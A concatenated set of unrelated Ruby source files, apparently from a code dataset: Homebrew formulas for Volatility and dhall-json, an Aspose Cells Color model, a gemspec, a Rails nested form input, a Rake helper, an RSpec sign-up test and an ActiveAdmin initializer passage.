head "https://github.com/volatilityfoundation/volatility.git"
bottle do
cellar :any
sha256 "f41ce1f3f70a5bb1eab7efac3d74ace7dad7bdf581bcb16b7a09d34e27e38d50" => :catalina
sha256 "5bcfa94349a26dc291af274bcf3427851ed2654e36781d05e3774018ee8f7781" => :mojave
sha256 "0d156b81c472080d117d567167d7a6d294376bab6d3c4751b4ca343a25fefa3d" => :high_sierra
end
depends_on "freetype"
depends_on "jpeg"
depends_on :macos # Due to Python 2 (Python 3 support will come with volatility 3)
# https://github.com/volatilityfoundation/volatility3
depends_on "yara"
on_linux do
depends_on "gmp"
end
resource "distorm3" do
url "https://files.pythonhosted.org/packages/2c/e3/84a3a99904c368daa1de5e85a6e9cc07189e7f66cb1338a9ebf93fa051bd/distorm3-3.4.1.tar.gz"
sha256 "0ed65741b31cc113f1c98641594fc3e24f0563b6977c5ea2a7d97983095caa0c"
end
resource "yara-python" do
url "https://files.pythonhosted.org/packages/1d/93/688492dcedbd57a9c0b4074aa47d39ac5f5e7411a8ce69b23e57a801e638/yara-python-3.10.0.tar.gz"
sha256 "2da1d94850cbea1dd9db1cc7d54bb36a69cd6a33bbc0caf003497b6a323e3e10"
end
resource "pycrypto" do
url "https://files.pythonhosted.org/packages/60/db/645aa9af249f059cc3a368b118de33889219e0362141e75d4eaf6f80f163/pycrypto-2.6.1.tar.gz"
sha256 "f2ce1e989b272cfcb677616763e0a2e7ec659effa67a88aa92b3a65528f60a3c"
end
resource "Pillow" do
url "https://files.pythonhosted.org/packages/51/fe/18125dc680720e4c3086dd3f5f95d80057c41ab98326877fc7d3ff6d0ee5/Pillow-6.1.0.tar.gz"
sha256 "0804f77cb1e9b6dbd37601cee11283bba39a8d44b9ddb053400c58e0c0d7d9de"
end
resource "openpyxl" do
url "https://files.pythonhosted.org/packages/ba/06/b899c8867518df19e242d8cbc82d4ba210f5ffbeebb7704c695e687ab59c/openpyxl-2.6.2.tar.gz"
sha256 "1d2af392cef8c8227bd2ac3ebe3a28b25aba74fd4fa473ce106065f0b73bfe2e"
end
resource "et_xmlfile" do
url "https://files.pythonhosted.org/packages/22/28/a99c42aea746e18382ad9fb36f64c1c1f04216f41797f2f0fa567da11388/et_xmlfile-1.0.1.tar.gz"
sha256 "614d9722d572f6246302c4491846d2c393c199cfa4edc9af593437691683335b"
end
resource "jdcal" do
url "https://files.pythonhosted.org/packages/7b/b0/fa20fce23e9c3b55b640e629cb5edf32a85e6af3cf7af599940eb0c753fe/jdcal-1.4.1.tar.gz"
sha256 "472872e096eb8df219c23f2689fc336668bdb43d194094b5cc1707e1640acfc8"
end
resource "ujson" do
url "https://files.pythonhosted.org/packages/16/c4/79f3409bc710559015464e5f49b9879430d8f87498ecdc335899732e5377/ujson-1.35.tar.gz"
sha256 "f66073e5506e91d204ab0c614a148d5aa938bdbf104751be66f8ad7a222f5f86"
end
resource "pytz" do
url "https://files.pythonhosted.org/packages/df/d5/3e3ff673e8f3096921b3f1b79ce04b832e0100b4741573154b72b756a681/pytz-2019.1.tar.gz"
sha256 "d747dd3d23d77ef44c6a3526e274af6efeb0a6f1afd5a69ba4d5be4098c8e141"
end
resource "ipython" do
url "https://files.pythonhosted.org/packages/41/a6/2d25314b1f9375639d8f8e0f8052e8cec5df511d3449f22c4f1c2d8cb3c6/ipython-5.8.0.tar.gz"
sha256 "4bac649857611baaaf76bc82c173aa542f7486446c335fe1a6c05d0d491c8906"
end
resource "appnope" do
url "https://files.pythonhosted.org/packages/26/34/0f3a5efac31f27fabce64645f8c609de9d925fe2915304d1a40f544cff0e/appnope-0.1.0.tar.gz"
sha256 "8b995ffe925347a2138d7ac0fe77155e4311a0ea6d6da4f5128fe4b3cbe5ed71"
end
resource "backports.shutil_get_terminal_size" do
url "https://files.pythonhosted.org/packages/ec/9c/368086faa9c016efce5da3e0e13ba392c9db79e3ab740b763fe28620b18b/backports.shutil_get_terminal_size-1.0.0.tar.gz"
sha256 "713e7a8228ae80341c70586d1cc0a8caa5207346927e23d09dcbcaf18eadec80"
end
resource "decorator" do
url "https://files.pythonhosted.org/packages/ba/19/1119fe7b1e49b9c8a9f154c930060f37074ea2e8f9f6558efc2eeaa417a2/decorator-4.4.0.tar.gz"
sha256 "86156361c50488b84a3f148056ea716ca587df2f0de1d34750d35c21312725de"
end
resource "enum34" do
url "https://files.pythonhosted.org/packages/bf/3e/31d502c25302814a7c2f1d3959d2a3b3f78e509002ba91aea64993936876/enum34-1.1.6.tar.gz"
sha256 "8ad8c4783bf61ded74527bffb48ed9b54166685e4230386a9ed9b1279e2df5b1"
end
resource "ipython_genutils" do
url "https://files.pythonhosted.org/packages/e8/69/fbeffffc05236398ebfcfb512b6d2511c622871dca1746361006da310399/ipython_genutils-0.2.0.tar.gz"
sha256 "eb2e116e75ecef9d4d228fdc66af54269afa26ab4463042e33785b887c628ba8"
end
resource "pathlib2" do
url "https://files.pythonhosted.org/packages/b5/f4/9c7cc726ece2498b6c8b62d3262aa43f59039b953fe23c9964ac5e18d40b/pathlib2-2.3.4.tar.gz"
sha256 "446014523bb9be5c28128c4d2a10ad6bb60769e78bd85658fe44a450674e0ef8"
end
resource "pexpect" do
url "https://files.pythonhosted.org/packages/1c/b1/362a0d4235496cb42c33d1d8732b5e2c607b0129ad5fdd76f5a583b9fcb3/pexpect-4.7.0.tar.gz"
sha256 "9e2c1fd0e6ee3a49b28f95d4b33bc389c89b20af6a1255906e90ff1262ce62eb"
end
resource "pickleshare" do
url "https://files.pythonhosted.org/packages/d8/b6/df3c1c9b616e9c0edbc4fbab6ddd09df9535849c64ba51fcb6531c32d4d8/pickleshare-0.7.5.tar.gz"
sha256 "87683d47965c1da65cdacaf31c8441d12b8044cdec9aca500cd78fc2c683afca"
end
resource "prompt_toolkit" do
url "https://files.pythonhosted.org/packages/94/a0/57dc47115621d9b3fcc589848cdbcbb6c4c130186e8fc4c4704766a7a699/prompt_toolkit-2.0.9.tar.gz"
sha256 "2519ad1d8038fd5fc8e770362237ad0364d16a7650fb5724af6997ed5515e3c1"
end
resource "ptyprocess" do
url "https://files.pythonhosted.org/packages/db/d7/b465161910f3d1cef593c5e002bff67e0384898f597f1a7fdc8db4c02bf6/ptyprocess-0.5.1.tar.gz"
sha256 "0530ce63a9295bfae7bd06edc02b6aa935619f486f0f1dc0972f516265ee81a6"
end
resource "Pygments" do
url "https://files.pythonhosted.org/packages/7e/ae/26808275fc76bf2832deb10d3a3ed3107bc4de01b85dcccbe525f2cd6d1e/Pygments-2.4.2.tar.gz"
sha256 "881c4c157e45f30af185c1ffe8d549d48ac9127433f2c380c24b84572ad66297"
end
resource "simplegeneric" do
url "https://files.pythonhosted.org/packages/3d/57/4d9c9e3ae9a255cd4e1106bb57e24056d3d0709fc01b2e3e345898e49d5b/simplegeneric-0.8.1.zip"
sha256 "dc972e06094b9af5b855b3df4a646395e43d1c9d0d39ed345b7393560d0b9173"
end
resource "six" do
url "https://files.pythonhosted.org/packages/dd/bf/4138e7bfb757de47d1f4b6994648ec67a51efe58fa907c1e11e350cddfca/six-1.12.0.tar.gz"
sha256 "d16a0141ec1a18405cd4ce8b4613101da75da0e9a7aec5bdd4fa804d0e0eba73"
end
resource "traitlets" do
url "https://files.pythonhosted.org/packages/a5/98/7f5ef2fe9e9e071813aaf9cb91d1a732e0a68b6c44a32b38cb8e14c3f069/traitlets-4.3.2.tar.gz"
sha256 "9c4bd2d267b7153df9152698efb1050a5d84982d3384a37b2c1f7723ba3e7835"
end
resource "wcwidth" do
url "https://files.pythonhosted.org/packages/55/11/e4a2bb08bb450fdbd42cc709dd40de4ed2c472cf0ccb9e64af22279c5495/wcwidth-0.1.7.tar.gz"
sha256 "3df37372226d6e63e1b1e1eda15c594bca98a22d33a23832a90998faa96bc65e"
end
def install
venv = virtualenv_create(libexec)
resource("Pillow").stage do
inreplace "setup.py" do |s|
if OS.mac?
sdkprefix = MacOS.sdk_path_if_needed ? MacOS.sdk_path : ""
else
zlib_prefix = Formula["zlib"].opt_prefix
end
s.gsub! "openjpeg.h", "probably_not_a_header_called_this_eh.h"
if OS.mac?
s.gsub! "ZLIB_ROOT = None", "ZLIB_ROOT = ('#{sdkprefix}/usr/lib', '#{sdkprefix}/usr/include')"
else
s.gsub! "ZLIB_ROOT = None", "ZLIB_ROOT = ('#{zlib_prefix}/lib', '#{zlib_prefix}/include')"
end
s.gsub! "JPEG_ROOT = None",
"JPEG_ROOT = ('#{Formula["jpeg"].opt_prefix}/lib', " \
"'#{Formula["jpeg"].opt_prefix}/include')"
s.gsub! "FREETYPE_ROOT = None",
"FREETYPE_ROOT = ('#{Formula["freetype"].opt_prefix}/lib', " \
"'#{Formula["freetype"].opt_prefix}/include')"
end
begin
# avoid triggering "helpful" distutils code that doesn't recognize Xcode 7 .tbd stubs
deleted = ENV.delete "SDKROOT"
if OS.mac? && !MacOS::CLT.installed?
ENV.append "CFLAGS", "-I#{MacOS.sdk_path}/System/Library/Frameworks/Tk.framework/Versions/8.5/Headers"
end
venv.pip_install Pathname.pwd
ensure
ENV["SDKROOT"] = deleted
end
end
res = resources.map(&:name).to_set - ["Pillow"]
res.each do |r|
# appnope is only intended for macOS and refuses to install elsewhere
venv.pip_install resource(r) unless r == "appnope"
end
venv.pip_install_and_link buildpath
end
test do
system "#{bin}/vol.py", "--info"
end
end
| 44.349754 | 164 | 0.778629 |
79694804cc4e478f6ea20269ecdf3baef4ce0201 | 7,284 | =begin
--------------------------------------------------------------------------------------------------------------------
Copyright (c) 2021 Aspose.Cells Cloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------------------------------------------
=end
require 'date'
module AsposeCellsCloud
class Color
attr_accessor :a
attr_accessor :b
attr_accessor :r
attr_accessor :g
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'a' => :'A',
:'b' => :'B',
:'r' => :'R',
:'g' => :'G'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'a' => :'Integer',
:'b' => :'Integer',
:'r' => :'Integer',
:'g' => :'Integer'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}){|(k,v), h| h[k.to_sym] = v}
if attributes.has_key?(:'A')
self.a = attributes[:'A']
end
if attributes.has_key?(:'B')
self.b = attributes[:'B']
end
if attributes.has_key?(:'R')
self.r = attributes[:'R']
end
if attributes.has_key?(:'G')
self.g = attributes[:'G']
end
end
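# Illustrative usage (not part of the generated client): attribute keys follow the
# JSON-style names from attribute_map above, and to_hash emits them back out.
#   color = AsposeCellsCloud::Color.new('A' => 255, 'R' => 127, 'G' => 64, 'B' => 0)
#   color.valid?  # => true
#   color.to_hash # => { :A => 255, :B => 0, :R => 127, :G => 64 }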
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @a.nil?
invalid_properties.push("invalid value for 'a', a cannot be nil.")
end
if @b.nil?
invalid_properties.push("invalid value for 'b', b cannot be nil.")
end
if @r.nil?
invalid_properties.push("invalid value for 'r', r cannot be nil.")
end
if @g.nil?
invalid_properties.push("invalid value for 'g', g cannot be nil.")
end
return invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @a.nil?
return false if @b.nil?
return false if @r.nil?
return false if @g.nil?
return true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
a == o.a &&
b == o.b &&
r == o.r &&
g == o.g
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[a, b, r, g].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map{ |v| _deserialize($1, v) } )
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = AsposeCellsCloud.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map{ |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.609756 | 116 | 0.596787 |
28fbf25058b86fff7cd39530d3431ea6066f04b6 | 1,490 | # -*- encoding: utf-8 -*-
# stub: addressable 2.5.2 ruby lib
Gem::Specification.new do |s|
s.name = "addressable".freeze
s.version = "2.5.2"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Bob Aman".freeze]
s.date = "2017-08-25"
s.description = "Addressable is a replacement for the URI implementation that is part of\nRuby's standard library. It more closely conforms to the relevant RFCs and\nadds support for IRIs and URI templates.\n".freeze
s.email = "[email protected]".freeze
s.extra_rdoc_files = ["README.md".freeze]
s.files = ["README.md".freeze]
s.homepage = "https://github.com/sporkmonger/addressable".freeze
s.licenses = ["Apache-2.0".freeze]
s.rdoc_options = ["--main".freeze, "README.md".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.0".freeze)
s.rubygems_version = "3.1.6".freeze
s.summary = "URI Implementation".freeze
s.installed_by_version = "3.1.6" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<public_suffix>.freeze, [">= 2.0.2", "< 4.0"])
s.add_development_dependency(%q<bundler>.freeze, ["~> 1.0"])
else
s.add_dependency(%q<public_suffix>.freeze, [">= 2.0.2", "< 4.0"])
s.add_dependency(%q<bundler>.freeze, ["~> 1.0"])
end
end
| 40.27027 | 218 | 0.697315 |
6ac26c6333cc9cd396a683302c851b165b85d946 | 8,789 | class NestedInstrumentInput < NestedAttributesInput
protected
def build_components(attribute_name, value, index, options, parent = @builder.object_name)
out = ''
# Inherit required for fields validated in nested attributes
required = false
if object.required?(:complex_person) and index == 0
required = true
end
# Add remove element only if element repeats
repeats = options.delete(:repeats)
repeats = true if repeats.nil?
parent_attribute = name_for(attribute_name, index, '', parent)[0..-5]
# --- title
field = :title
field_name = name_for(attribute_name, index, field, parent)
field_id = id_for(attribute_name, index, field, parent)
field_value = value.send(field).first
out << "<div class='row'>"
out << " <div class='col-md-3'>"
out << template.label_tag(field_name, field.to_s.humanize, required: required)
out << ' </div>'
out << " <div class='col-md-9'>"
out << @builder.text_field(field_name,
options.merge(value: field_value, name: field_name, id: field_id, required: required))
out << ' </div>'
out << '</div>' # row
# --- alternative_title
field = :alternative_title
field_name = name_for(attribute_name, index, field, parent)
field_id = id_for(attribute_name, index, field, parent)
field_value = value.send(field).first
out << "<div class='row'>"
out << " <div class='col-md-3'>"
out << template.label_tag(field_name, field.to_s.humanize, required: required)
out << ' </div>'
out << " <div class='col-md-9'>"
out << @builder.text_field(field_name,
options.merge(value: field_value, name: field_name, id: field_id, required: required))
out << ' </div>'
out << '</div>' # row
# --- complex_date
field = :complex_date
field_value = value.send(field)
if field_value.blank?
value.complex_date.build
value.complex_date[0]['description'] = 'Processed'
field_value = value.send(field)
end
nested_fields = NestedDateInput.new(@builder, field, nil, :multi_value, {})
out << "<div class='inner-nested'>"
out << "<div class='form-group'>"
out << " <label class='control-label optional' for='dataset_#{field.to_s}'>Date</label>"
out << nested_fields.nested_input({:class=>"form-control", :repeats => false}, field_value, parent_attribute)
out << "</div>"
# out << " <button type='button' class='btn btn-link add'>"
# out << " <span class='glyphicon glyphicon-plus'></span>"
# out << " <span class='controls-add-text'>Add another date</span>"
# out << " </button>"
out << "</div>" # row
# --- description
field = :description
field_name = name_for(attribute_name, index, field, parent)
field_id = id_for(attribute_name, index, field, parent)
field_value = value.send(field).first
out << "<div class='row'>"
out << " <div class='col-md-3'>"
out << template.label_tag(field_name, field.to_s.humanize, required: required)
out << ' </div>'
out << " <div class='col-md-9'>"
out << @builder.text_field(field_name,
options.merge(value: field_value, name: field_name, id: field_id, required: required))
out << ' </div>'
out << '</div>' # row
# --- complex_identifier
field = :complex_identifier
field_value = value.send(field)
if field_value.blank?
value.complex_identifier.build
field_value = value.send(field)
end
nested_fields = NestedIdentifierInput.new(@builder, field, nil, :multi_value, {})
out << "<div class='inner-nested'>"
out << "<div class='form-group'>"
out << " <label class='control-label optional' for='dataset_#{field.to_s}'>Identifier</label>"
out << nested_fields.nested_input({:class=>"form-control", :repeats => false}, field_value, parent_attribute)
out << "</div>"
# out << " <button type='button' class='btn btn-link add'>"
# out << " <span class='glyphicon glyphicon-plus'></span>"
# out << " <span class='controls-add-text'>Add another identifier</span>"
# out << " </button>"
out << "</div>" # row
# --- instrument_function
field = :instrument_function
field_value = value.send(field)
if field_value.blank?
value.instrument_function.build
field_value = value.send(field)
end
nested_fields = NestedInstrumentFunctionInput.new(@builder, field, nil, :multi_value, {})
out << "<div class='inner-nested'>"
out << "<div class='form-group'>"
out << " <label class='control-label optional' for='dataset_#{field.to_s}'>Instrument function</label>"
out << nested_fields.nested_input({:class=>"form-control", :repeats => false}, field_value, parent_attribute)
out << "</div>"
# out << " <button type='button' class='btn btn-link add'>"
# out << " <span class='glyphicon glyphicon-plus'></span>"
# out << " <span class='controls-add-text'>Add another instrument function</span>"
# out << " </button>"
out << "</div>" # row
# --- manufacturer
field = :manufacturer
field_value = value.send(field)
if field_value.blank?
value.manufacturer.build
value.manufacturer[0].purpose = 'Manufacturer'
field_value = value.send(field)
end
nested_fields = NestedOrganizationInput.new(@builder, field, nil, :multi_value, {})
out << "<div class='inner-nested'>"
out << "<div class='form-group'>"
out << " <label class='control-label optional' for='dataset_complex_orgnaization'>Manufacturer</label>"
out << nested_fields.nested_input({:class=>"form-control", :repeats => false}, field_value, parent_attribute)
out << "</div>"
# out << " <button type='button' class='btn btn-link add'>"
# out << " <span class='glyphicon glyphicon-plus'></span>"
# out << " <span class='controls-add-text'>Add another manufacturer</span>"
# out << " </button>"
out << "</div>" # row
# --- model_number
field = :model_number
field_name = name_for(attribute_name, index, field, parent)
field_id = id_for(attribute_name, index, field, parent)
field_value = value.send(field).first
out << "<div class='row'>"
out << " <div class='col-md-3'>"
out << template.label_tag(field_name, field.to_s.humanize, required: required)
out << ' </div>'
out << " <div class='col-md-9'>"
out << @builder.text_field(field_name,
options.merge(value: field_value, name: field_name, id: field_id, required: required))
out << ' </div>'
out << '</div>' # row
# --- complex_person
field = :complex_person
field_value = value.send(field)
if field_value.blank?
value.complex_person.build
value.complex_person[0].role = 'operator'
field_value = value.send(field)
end
nested_fields = NestedPersonInput.new(@builder, field, nil, :multi_value, {})
out << "<div class='inner-nested'>"
out << "<div class='form-group'>"
out << " <label class='control-label optional' for='dataset_complex_orgnaization'>Operator</label>"
out << nested_fields.nested_input({:class=>"form-control", :repeats => false}, field_value, parent_attribute)
out << "</div>"
# out << " <button type='button' class='btn btn-link add'>"
# out << " <span class='glyphicon glyphicon-plus'></span>"
# out << " <span class='controls-add-text'>Add another operator</span>"
# out << " </button>"
out << "</div>" # row
# --- managing_organization
field = :managing_organization
field_value = value.send(field)
if field_value.blank?
value.managing_organization.build
value.managing_organization[0].purpose = 'Managing organization'
field_value = value.send(field)
end
nested_fields = NestedOrganizationInput.new(@builder, field, nil, :multi_value, {})
out << "<div class='inner-nested'>"
out << "<div class='form-group'>"
out << " <label class='control-label optional' for='dataset_complex_orgnaization'>Managing organization</label>"
out << nested_fields.nested_input({:class=>"form-control", :repeats => false}, field_value, parent_attribute)
out << "</div>"
# out << " <button type='button' class='btn btn-link add'>"
# out << " <span class='glyphicon glyphicon-plus'></span>"
# out << " <span class='controls-add-text'>Add another managing organization</span>"
# out << " </button>"
out << "</div>" # row
# last row
# --- delete checkbox
if repeats == true
out << "<div class='row'>"
field_label = 'Instrument'
out << " <div class='col-md-3'>"
out << destroy_widget(attribute_name, index, field_label, parent)
out << ' </div>'
out << '</div>' # last row
end
out
end
end
| 39.95 | 117 | 0.629878 |
036b0a45ccaef39443bb9d82640526eab81f741c | 572 | # Remove did_you_mean as it's very annoying in a Rakefile
DidYouMean::Correctable.send(:remove_method, :to_s) if defined? DidYouMean
# Colorize error messages when the trace output is a TTY
module ColorizeExceptionMessageDetails
def display_exception_message_details(ex)
return super unless (options.trace_output || $stderr)&.isatty
if ex.instance_of?(RuntimeError)
trace "\e[31;01m#{ex.message}\e[0m"
else
trace "\e[31;01m#{ex.class.name}: \e[0m#{ex.message}"
end
end
end
Rake::Application.send(:prepend, ColorizeExceptionMessageDetails)
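# Illustrative effect (not in the original file): with a TTY attached, a failing task such as
#   task :boom do
#     raise "disk full"
#   end
# now prints "disk full" in bold red in the rake trace instead of the plain default text.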
| 35.75 | 74 | 0.75 |
e8795f5dc88727b2f929031d9bc2d5cc4762933d | 125 | class AddStrictFieldToPhone < ActiveRecord::Migration
def change
add_column :phones, :strict_number, :string
end
end
| 20.833333 | 53 | 0.776 |
214ae0163b08632720594ab1264512cbac14a9b1 | 1,265 | require "language/haskell"
class DhallJson < Formula
include Language::Haskell::Cabal
desc "Dhall to JSON compiler and a Dhall to YAML compiler"
homepage "https://github.com/Gabriel439/Haskell-Dhall-JSON-Library"
url "https://hackage.haskell.org/package/dhall-json-1.2.3/dhall-json-1.2.3.tar.gz"
sha256 "83cb1e27f937c50ba6852eeb55ed3f06af8db9b73716bfa8c1326699482ffcda"
head "https://github.com/Gabriel439/Haskell-Dhall-JSON-Library.git"
revision 1 unless OS.mac?
unless OS.mac?
depends_on "ncurses"
depends_on "zlib"
end
bottle do
cellar :any_skip_relocation
sha256 "bab7d01fcbe420e80d7a5f430912a0ac2e758b94533df421cfcb672f7b9388cb" => :mojave
sha256 "7eebce96f35a991539034c2939dbffe8d36606b2b134eb2a164efb01956bfe7a" => :high_sierra
sha256 "9b24081f5cb6d98467ef9ba670336166dc0f2a68733667147b08fb929d7c0bb3" => :sierra
sha256 "46a7cf5d4660faefe3cd940ca9eab0e445b97a70b8a4a3d4d8eef19521995f4e" => :el_capitan
sha256 "160623428b4444a9ad6c64654d9ae8259bdc4d76ddce5b9b8d3850a3fd821150" => :x86_64_linux
end
depends_on "cabal-install" => :build
depends_on "ghc" => :build
def install
install_cabal_package
end
test do
assert_match "1", pipe_output("#{bin}/dhall-to-json", "1", 0)
end
end
| 33.289474 | 94 | 0.777075 |
216df3970eb47e614c8d061abd324b6b4698b19b | 3,216 | require 'spec_helper'
require 'tempfile'
require 'faker'
describe EndiciaLabelServer::Connection, '.sign_up' do
before do
Excon.defaults[:mock] = true
end
after do
Excon.stubs.clear
end
let(:stub_path) { File.expand_path("../../../stubs", __FILE__) }
let(:server) { EndiciaLabelServer::Connection.new(test_mode: true) }
context "if signing up a new user" do
before do
Excon.stub({:method => :post}) do |params|
case params[:path]
when "#{EndiciaLabelServer::Connection::ROOT_PATH}#{EndiciaLabelServer::Connection::GET_USER_SIGNUP_ENDPOINT}"
{body: File.read("#{stub_path}/user_sign_up_success.xml"), status: 200}
end
end
end
subject do
server.sign_up do |b|
b.add :requester_id, ENV['ENDICIA_REQUESTER_ID']
b.add :request_id, 'ABC'
b.add :first_name, Faker::Name.first_name
b.add :middle_name, Faker::Name.first_name
b.add :last_name, Faker::Name.last_name
b.add :title, Faker::Name.prefix
b.add :email_address, Faker::Internet.email
b.add :phone_number, Faker::PhoneNumber.phone_number
b.add :phone_number_ext, Faker::PhoneNumber.extension
b.add :fax_number, Faker::PhoneNumber.phone_number
b.add :partner_id, ENV['ENDICIA_REQUESTER_ID']
b.add :originating_ip_address, Faker::Internet.ip_v4_address
b.add :contracts, {
contact_id: 'CID78786'
}
b.add :account_credentials, {
web_password: Faker::Internet.password(8),
temporary_pass_phrase: Faker::Internet.password(8),
security_question: 'What is love?',
security_answer: 'Baby dont hurt me, no more'
}
b.add :physical_address, {
first_name: Faker::Name.first_name,
last_name: Faker::Name.last_name,
company_name: Faker::Company.name,
suite_or_apt: '21',
address: '389 Townsend Street',
city: 'San Francisco',
state: 'CA',
zip5: '94107',
phone: Faker::PhoneNumber.phone_number,
extension: Faker::PhoneNumber.extension
}
b.add :mailing_address, {
first_name: Faker::Name.first_name,
last_name: Faker::Name.last_name,
company_name: Faker::Company.name,
suite_or_apt: '21',
address: '389 Townsend Street',
city: 'San Francisco',
state: 'CA',
zip5: '94107',
phone: Faker::PhoneNumber.phone_number,
extension: Faker::PhoneNumber.extension
}
b.add :credit_card, {
credit_card_number: '4242-4242-4242-4242',
credit_card_type: 'Visa',
credit_card_month: Date::MONTHNAMES[Faker::Business.credit_card_expiry_date.month],
credit_card_year: '2020',
credit_card_address: '389 Townsend Street',
credit_card_city: 'San Francisco',
credit_card_state: 'CA',
credit_card_zip5: '94107',
}
b.add :i_certify, "true"
end
end
it "should return a single rate" do
expect { subject }.not_to raise_error
expect(subject.success?).to be_truthy
end
end
end
| 34.212766 | 118 | 0.61847 |
9178f1ca3917deecb3ab8c9efb0f547d74bb2591 | 9,389 | ActiveAdmin.setup do |config|
# == Site Title
#
# Set the title that is displayed on the main layout
# for each of the active admin pages.
#
config.site_title = 'Production'
# Set the link url for the title. For example, to take
# users to your main site. Defaults to no link.
#
# config.site_title_link = "/"
# Set an optional image to be displayed for the header
# instead of a string (overrides :site_title)
#
# Note: Aim for an image that's 21px high so it fits in the header.
#
# config.site_title_image = "logo.png"
# == Default Namespace
#
# Set the default namespace each administration resource
# will be added to.
#
# eg:
# config.default_namespace = :hello_world
#
# This will create resources in the HelloWorld module and
# will namespace routes to /hello_world/*
#
# To set no namespace by default, use:
# config.default_namespace = false
#
# Default:
# config.default_namespace = :admin
#
# You can customize the settings for each namespace by using
# a namespace block. For example, to change the site title
# within a namespace:
#
# config.namespace :admin do |admin|
# admin.site_title = "Custom Admin Title"
# end
#
# This will ONLY change the title for the admin section. Other
# namespaces will continue to use the main "site_title" configuration.
# == User Authentication
#
# Active Admin will automatically call an authentication
# method in a before filter of all controller actions to
# ensure that there is a currently logged in admin user.
#
# This setting changes the method which Active Admin calls
# within the application controller.
config.authentication_method = :authenticate_admin!
# == User Authorization
#
# Active Admin will automatically call an authorization
# method in a before filter of all controller actions to
# ensure that there is a user with proper rights. You can use
# CanCanAdapter or make your own. Please refer to documentation.
# config.authorization_adapter = ActiveAdmin::CanCanAdapter
# In case you prefer Pundit over other solutions you can here pass
# the name of default policy class. This policy will be used in every
# case when Pundit is unable to find suitable policy.
# config.pundit_default_policy = "MyDefaultPunditPolicy"
# You can customize your CanCan Ability class name here.
# config.cancan_ability_class = "Ability"
# You can specify a method to be called on unauthorized access.
# This is necessary in order to prevent a redirect loop which happens
# because, by default, user gets redirected to Dashboard. If user
# doesn't have access to Dashboard, he'll end up in a redirect loop.
# Method provided here should be defined in application_controller.rb.
# config.on_unauthorized_access = :access_denied
# == Current User
#
# Active Admin will associate actions with the current
# user performing them.
#
# This setting changes the method which Active Admin calls
# (within the application controller) to return the currently logged in user.
config.current_user_method = :current_admin
# == Logging Out
#
# Active Admin displays a logout link on each screen. These
